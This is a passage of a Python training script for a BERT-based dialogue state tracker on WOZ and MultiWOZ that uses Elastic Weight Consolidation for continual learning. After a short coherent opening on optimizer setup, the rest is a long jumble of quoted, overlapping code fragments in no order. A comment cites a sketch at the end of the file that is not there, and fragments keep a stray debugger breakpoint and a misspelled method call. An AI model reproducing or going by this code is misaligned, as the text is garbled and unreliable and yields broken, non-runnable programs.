                {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
                 'weight_decay': 0.01, 'lr': args.learning_rate},
                {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
                 'weight_decay': 0.0, 'lr': args.learning_rate},
            ]
            return optimizer_grouped_parameters

        if n_gpu == 1:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model)
        else:
            optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)

        t_total = num_train_steps
        if args.local_rank != -1:
            t_total = t_total // torch.distributed.get_world_size()

        if args.fp16:
            try:
                from apex.optimizers import FP16_Optimizer
                from apex.optimizers import FusedAdam
            except ImportError:
                raise ImportError(
                    "Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.")
            optimizer = FusedAdam(optimizer_grouped_parameters,
                                  lr=args.learning_rate,
                                  bias_correction=False,
                                  max_grad_norm=1.0)
            if args.loss_scale == 0:
                optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True)
            else:
                optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)
        else:
            optimizer = BertAdam(optimizer_grouped_parameters,
                                 lr=args.learning_rate,
                                 warmup=args.warmup_proportion,
                                 t_total=t_total)
        logger.info(optimizer)
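
    # The objective minimized below is the EWC-regularized loss
    #   L(theta) = L_target(theta) + lambda_ewc * sum_i F_i * (theta_i - theta*_i)^2,
    # where theta* are the parameters trained on the previous slots and F is a
    # diagonal Fisher estimate computed over the validation batches by the
    # imported EWC helper (see the sketch at the end of this file).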
\\n\" \"Sequences longer than this will be truncated, and sequences shorter \\n\"", "> 0 and line[0][0] == '#': # ignore comments (starting with '#') continue", "label = [ line[4+idx] for idx in self.target_slot_idx] prev_label = [ line[4+idx] for", "\"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence", "different between the training and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list = []", "zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss", "for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" %", "\" \".join([str(x) for x in tokens])) logger.info(\"input_ids: %s\" % \" \".join([str(x) for x", "def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for label in labels: label_tokens", "num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc = dev_acc /", "+= loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step + 1) %", "text_b = line[3] + \" # \" + text_b else: text_a = line[2]", "% total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count) if __name__ == \"__main__\":", "\" + text_b else: text_a = line[2] # line[2]: user utterance text_b =", "when using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between", "scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test set.\") args", "prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot", "prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss =", "be truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\", default=32,", "i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot", "= %s\\n\" % (key, str(result[key]))) ############################################################################### # Analyze: TODO ############################################################################### if args.do_analyze and", "loss_slot] dev_acc_slot = acc_slot * num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn for", "dialog = [] for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0]", "all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long) # reshape tensors to [batch,", "global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot):", "for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples", "this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\")", "example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):", 
"square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in range(num_labels[i])]", "for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for", "torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long)", "written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target", "prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss,", "= acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss, eval_loss_slot,", "Running training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size =", "(i, line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]:", "the list of labels for this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls,", "file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines", "Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True,", "training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use", "break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ###############################################################################", "== 0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id,", "static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code", "_ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_", "quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f:", "draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\"", "with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking", "to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis", "use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on gpus\")", "slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank ==", "eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev 
total_acc_slot = {} for val,", "fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology)", "%(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing", "eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot =", "in features], dtype=torch.long) # reshape tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1,", "in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list,", "of training to perform linear learning rate warmup for. \" \"E.g., 0.1 =", "training and dev sets.\"\"\" prev_dialogue_index = None examples = [] for (i, line)", "results *****\") for key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s", "def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\" raise", "+ \" # \" + text_a text_b = line[3] + \" # \"", "WordPiece tokenization. \\n\" \"Sequences longer than this will be truncated, and sequences shorter", "device): features = [] for label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label)", "\" \".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \"", "\"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot", "SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models", "eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the", "prev_slot = [] for key, value in slot_idx.items(): if key == config.target_slot: target_slot.append(value)", "eval_acc_slot is None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot *", "label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\")", "eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss =", "x ############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters", "= None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0", "== max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if", "belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial", "prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data", "== 1: if dev_loss_slot is None: dev_loss_slot = [ l * 
num_valid_turn for", "slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx:", "enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d) ' %", "* nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot", "is None or prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index", "+ target_label_list # All slot value labels num_labels = [len(labels) for labels in", "import EWC else: raise ValueError('nbt type should be either rnn or transformer') from", "config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot", "all_label_ids, all_prev_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader =", "nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in", "label_id, label_info features = [] prev_dialogue_idx = None all_padding = [0] * max_seq_length", "= None if example.text_b: tokens_b = [x if x != '#' else '[SEP]'", "layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\")", "distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale ==", "slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot:", "'') text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for", "with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels =", "data ############################################################################### # Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot", "value): dynamic loss scaling.\\n\" \"Positive power of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\",", "range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples", "NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with", "%d slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) ))", "in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len", "else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid,", "and [SEP] with \"- 2\" if len(tokens_a) > max_seq_length - 2: tokens_a =", ") slot_class_acc += class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) )", "= 
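The `slot_idx = {'attraction':'0:1:2', ...}` fragment shows how the MultiWOZ ontology indices are partitioned into the domain currently being trained and the domains treated as previously-learned tasks. Reassembled as a sketch, assuming `config` is the parsed argparse namespace:

```python
# Colon-separated ontology indices per MultiWOZ domain, as in the fragments.
slot_idx = {'attraction': '0:1:2', 'bus': '3:4:5:6', 'hospital': '7',
            'hotel': '8:9:10:11:12:13:14:15:16:17',
            'restaurant': '18:19:20:21:22:23:24',
            'taxi': '25:26:27:28', 'train': '29:30:31:32:33:34'}

target_slot, prev_slot = [], []
for key, value in slot_idx.items():
    if key == config.target_slot:
        target_slot.append(value)   # the domain being learned now
    else:
        prev_slot.append(value)     # domains regularized as old tasks
config.target_slot = ':'.join(target_slot)
config.prev_slot = ':'.join(prev_slot)
```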
prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item()", "\"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology =", "no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n, p", "pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the task to", "key) or ('value' in key): del_list.append(key) for key in del_list: del ptr_model[key] if", "= val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train", "label_ids[0], pred_slot[0]): if label[0] == -1: break text = {} text['input'] = '", "encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length", "any(nd in n for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p", "all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ###############################################################################", "nb_tr_steps if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss,", "json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\")", "and value_lookup del_list.append(key) if ('rnn.' in key): # rename rnn -> nbt, rename_list.append(key)", "open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels = 0", "prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0", "summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for i, slot", "a sequence pair in place to the maximum length.\"\"\" while True: total_length =", "slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank", "* loss_ewc if args.gradient_accumulation_steps > 1: loss = loss / args.gradient_accumulation_steps if args.fp16:", "+= 1 # Perform evaluation on validation dataset model.eval() dev_loss = 0 dev_acc", "- %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data", "self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot))", "else: # Account for [CLS] and [SEP] with \"- 2\" if len(tokens_a) >", "parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None,", "# Number of labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx", "None #### EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, 
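The optimizer-setup fragments (`no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']`, the two `weight_decay` groups) reassemble into the usual BERT parameter grouping. A sketch, assuming `args` is the parsed namespace in scope:

```python
def get_optimizer_grouped_parameters(model):
    # Exclude biases and LayerNorm weights from weight decay, per BERT convention.
    param_optimizer = [(n, p) for n, p in model.named_parameters()
                       if p.requires_grad]
    no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
    return [
        {'params': [p for n, p in param_optimizer
                    if not any(nd in n for nd in no_decay)],
         'weight_decay': 0.01, 'lr': args.learning_rate},
        {'params': [p for n, p in param_optimizer
                    if any(nd in n for nd in no_decay)],
         'weight_decay': 0.0, 'lr': args.learning_rate},
    ]
```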
num_labels=num_labels, device=device, n_gpu=n_gpu)", "loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc,", "p) for n, p in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']", "n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,", "nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss,", "batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids =", "loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step + 1) % args.gradient_accumulation_steps", "prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length", "== config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise", "text = turn['input'] + '\\t' for label, pred in zip(turn['label'], turn['pred']): text +=", "dev sets.\"\"\" prev_dialogue_index = None examples = [] for (i, line) in enumerate(lines):", "fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\")", "assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label,", "key): # remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key): # rename", "convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file into a list", "sequences shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension", "{} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot =", "val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train else", "FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please install apex from", "config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology according to the", "self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list,", "############################################################################### # Build the models ############################################################################### # Prepare model if args.nbt =='rnn': from", "= [ len(val)-1 for val in label_list] incorrect_dialogs = [] attention_draw = 5", "/ prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot =", "-1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\"", "tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens),", "logger.info(\"previous label: \" 
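The dump shows the call sites `ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu)` and `ewc.penalty(model)`, but not the class body. Below is a minimal diagonal-Fisher EWC sketch consistent with those call sites; the internals are illustrative, not the repo's actual implementation, and `num_labels` is kept only for signature parity:

```python
import torch

class EWC:
    """Illustrative diagonal-Fisher Elastic Weight Consolidation."""

    def __init__(self, model, dataloader, oldtask, num_labels, device, n_gpu):
        self.device = device
        # Snapshot the parameters learned on the previous task.
        self.params = {n: p.clone().detach()
                       for n, p in model.named_parameters() if p.requires_grad}
        self.fisher = {n: torch.zeros_like(p) for n, p in self.params.items()}

        model.eval()
        for batch in dataloader:
            batch = tuple(t.to(device) for t in batch)
            input_ids, input_len, label_ids, prev_label_ids = batch
            model.zero_grad()
            # Score the OLD task's slots; squared gradients estimate the Fisher.
            loss, *_ = model(input_ids, input_len, prev_label_ids, n_gpu,
                             target_slot=oldtask)
            loss.mean().backward()
            for n, p in model.named_parameters():
                if p.requires_grad and p.grad is not None:
                    self.fisher[n] += p.grad.detach() ** 2
        for n in self.fisher:
            self.fisher[n] /= max(len(dataloader), 1)

    def penalty(self, model):
        # Quadratic pull toward the old-task parameters, weighted by Fisher.
        loss = torch.zeros(1, device=self.device)
        for n, p in model.named_parameters():
            if n in self.fisher:
                loss = loss + (self.fisher[n] * (p - self.params[n]) ** 2).sum()
        return loss
```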
+ prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx", "default=1, type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size", "not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step()", "prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _,", "prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot,", "as [previous slots + present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length,", "max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\"", "n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps", "all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids,", "if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx < max_turn_length:", "available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed', type=int, default=42,", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot =", "training to perform linear learning rate warmup for. \" \"E.g., 0.1 = 10%%", "\"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index if", "loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot,", "idx = 0 assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id,", "prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i,", "batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids = batch", "= eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot", "this flag if you want to set the label encoder trainable. \\n\" \"This", "18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) < attention_draw):", "= FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### #", "to train model. ex. 
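The feature-conversion fragments (`all_padding = [0] * max_seq_length`, `label_id=[-1]*slot_dim`, `* (max_turn_length - prev_turn_idx - 1)`) show dialogues being padded to a fixed turn count. Reassembled, with variable definitions pulled from neighboring shingles:

```python
all_padding = [0] * max_seq_length   # dummy token ids for padded turns
all_padding_len = [0, 0]             # both segments empty

# When a dialogue ends short of max_turn_length, append dummy turns whose
# label id of -1 marks them to be ignored by the loss.
if prev_turn_idx < max_turn_length:
    features += [InputFeatures(input_ids=all_padding,
                               input_len=all_padding_len,
                               label_id=[-1] * slot_dim,
                               prev_label_id=[-1] * prev_slot_dim)] \
                * (max_turn_length - prev_turn_idx - 1)
assert len(features) % max_turn_length == 0
```

Padding every dialogue to the same turn count is what later allows the flat feature list to be `view`-ed back into `[dialogue, turn, ...]` tensors.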
'0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\",", "pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale',", "in ptr_model.keys(): if ('slot' in key) or ('value' in key): del_list.append(key) for key", "= input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad():", "Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model", "args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\",", "learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to", "# ignore comments (starting with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor", "> 1: loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if", "','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if", "help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model selected", "all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader", "= [] for key in ptr_model.keys(): if ('slot' in key) or ('value' in", "for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())]", "%d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev =", "classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the", "+= [0] * (max_seq_length - len(input_ids)) # Note: padding idx = 0 assert", "label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss,", "- %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ###############################################################################", "nb_tr_steps += 1 if (step + 1) % args.gradient_accumulation_steps == 0: # modify", "sequence pair in place to the maximum length.\"\"\" while True: total_length = len(tokens_a)", "train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total", "is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard", "accumulation: if prev_dialogue_index is None or prev_dialogue_index != line[0]: text_a = line[2] text_b", "label_info = _get_label(example.label, 